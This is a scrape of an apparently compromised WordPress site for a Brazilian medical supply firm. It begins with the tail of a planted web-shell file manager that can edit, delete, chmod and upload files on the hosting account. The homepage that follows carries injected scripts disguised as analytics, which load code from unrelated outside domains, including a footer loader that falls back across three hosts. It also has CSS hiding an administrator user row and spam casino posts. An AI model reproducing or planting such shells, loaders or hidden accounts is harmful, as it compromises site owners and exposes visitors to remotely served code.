                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="file-link">📄 xmlrpc.php</a></td>
                            <td class="size">3.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-08 18:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/xmlrpc.php','xmlrpc.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/xmlrpc.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/xmlrpc.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                        </tbody>
            </table>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/home2/pablod78/public_html';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//viorsoonlucid.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6aa86fe84b0db*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://viorsoonlucid.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/07/resources-online-casino-magyar/">Resources: online casino magyar</a></h2><p>More details available at online casino magyar.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/en-otras-palabras-que-nada-mas-hallaras-operadores-legales-asi%ef%bf%bd-como-profesional-en-la-pagina/">En otras palabras, que nada mas hallaras operadores legales asi� como profesional en la pagina</a></h2><p>Del estar centrada en el comercio castellano, provee asiento sobre pago localizado, aunque conviene calcular las requisitos sobre envite sobre 60x en desarrollar todo bono https://vegasmobilecasino.net/es-es/bono-sin-deposito/ . Consulta siempre las terminos especialistas para todo casino con el fin de evitar sorpresas asi� como incrementar tu vivencia de esparcimiento. Las depositos minimos suelen iniciar empezando desde [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/ten-best-see-real-cash-casinos-on-the-internet-casino-games-summer-2024/">ten Best see Real cash Casinos on the internet &#038; Casino games Summer 2024</a></h2><p>Articles See | Play for Totally free: Pa Online casino No-deposit Bonuses 2024 The way i Look at A real income Web based poker What is A keen Irish Real money Casino? Required You Blackjack Internet sites For Summer Choosing An informed Real money Us Local casino App Megapari Local casino couples with nearly 120 [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/finest-shell-out-by-the-cell-funky-fruits-for-mobile-phone-statement-gambling-enterprises-uk-2021/">Finest Shell out By the Cell funky fruits for mobile phone Statement Gambling enterprises Uk 2021</a></h2><p>Content Safest Self-help guide to Claiming Deposit £step one Bonuses: funky fruits for mobile Spela Casino The telephone Gambling enterprise Licensing &#038; Security5 These types of operators along with tend to element in the better casino websites round the the world. They offer titles with features, top-notch image and you can funky fruits for mobile [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/finest-united-kingdom-local-casino-bonuses-and-casino-100-free-spins-casino-leo-vegas-also-provides-could-possibly-get-2024/">Finest United kingdom Local casino Bonuses And Casino 100 free spins casino Leo Vegas Also provides Could possibly get 2024</a></h2><p>Articles Could it be Safe So you can Enjoy In the A great British Internet casino? &#8211; 100 free spins casino Leo Vegas Safe and Responsible Gambling enterprise Betting Cellular Black-jack Gambling enterprises And that Percentage Actions Should i Explore To your A casino Application? An informed Cellular Casinos In the united kingdom To possess [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/finest-united-states-100-percent-free-21prive-casino-best-slot-game-revolves-gambling-enterprises-june-2024/">Finest United states 100 percent free 21Prive casino best slot game Revolves Gambling enterprises June 2024</a></h2><p>Content 21Prive casino best slot game &#8211; Gambling establishment Of your own Week June 2024 Finest Cellular No deposit Casino Bonus For United kingdom Participants Stating A free of charge £5 No-deposit Gambling establishment Extra For brand new Professionals What are the Best Pokies Playing Having A no deposit Gambling enterprise Bonus? If you are [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/greatest-no-deposit-bonuses-codes-2024-star-trek-pokie-online-casino-all-of-us-casinos-on-the-internet/">Greatest No-deposit Bonuses &#038; Codes 2024 star trek pokie online casino All of us Casinos on the internet</a></h2><p>Articles Star trek pokie online casino: Totally free Revolves With Totally free Dollars To many other Gambling games Play Millionaire Genie Position For free With no Deposit Cellular Local casino No deposit Necessary Key points When Positions Mobile Local casino No deposit Sales As the detachment star trek pokie online casino procedure can vary out [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/greatest-on-line-casino-slot-planet-real-money-roulette-web-sites-us-2024/">Greatest On line casino slot planet real money Roulette Web sites Us 2024</a></h2><p>Blogs Ive Heard No-deposit Internet sites Contain the Payouts Is the fact Real?: casino slot planet real money Full Listing of Reduced Lowest Deposit Casinos Top Finest $step one Put Added bonus Online casinos Inside the 2024 Apart from the next acceptance render, there is a great coolDraftKings recommend-a-friendand theDynasty VIP strategy. In the event [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/bitcoin-no-deposit-gambling-davinci-diamonds-no-deposit-enterprise-incentive-2024/">Bitcoin No-deposit Gambling davinci diamonds no deposit enterprise Incentive 2024</a></h2><p>Content How can i Begin Claiming A no-deposit Bonus?: davinci diamonds no deposit Bitcoin Casino No-deposit Extra Oshi Gambling establishment There are also around 750 choice-free spins up for grabs altogether when you deposit. You might select sometimes a great a hundred% added bonus otherwise up to 250 bet-100 percent free revolves when you create [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/local-casino-heroes-nz-%ef%b8%8f-extra-100-percent-drive-multiplier-mayhem-casinos-free-spins-comment/">Local casino Heroes Nz ️ Extra &#038; 100 percent Drive Multiplier Mayhem casinos free Spins Comment</a></h2><p>Articles Drive Multiplier Mayhem casinos &#8211; Local casino Heroes Games And you can App Designers Pink Gambling establishment Kuka To your Gambling establishment Heroes Omistaja? Real time Streaming The Summary To your Cellular Gambling enterprises When you discover product sales product from Spinheroes, we processes information regarding your own name, email address, number, an such [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/14/british-slot-game-big-bad-wolf-internet-casino-no-deposit-added-bonus/">British slot game big bad wolf Internet casino No-deposit Added bonus</a></h2><p>Articles Tips Check in During the Red coral Local casino | slot game big bad wolf Rating 10 No-deposit 100 percent free Revolves No deposit Required* What to Take a look at Before choosing No-deposit Joya Casino Popular Errors To avoid When using Every day Spins Transferring and you will withdrawing money is not difficult [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/?c=2d3854890" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
</body>
</html>
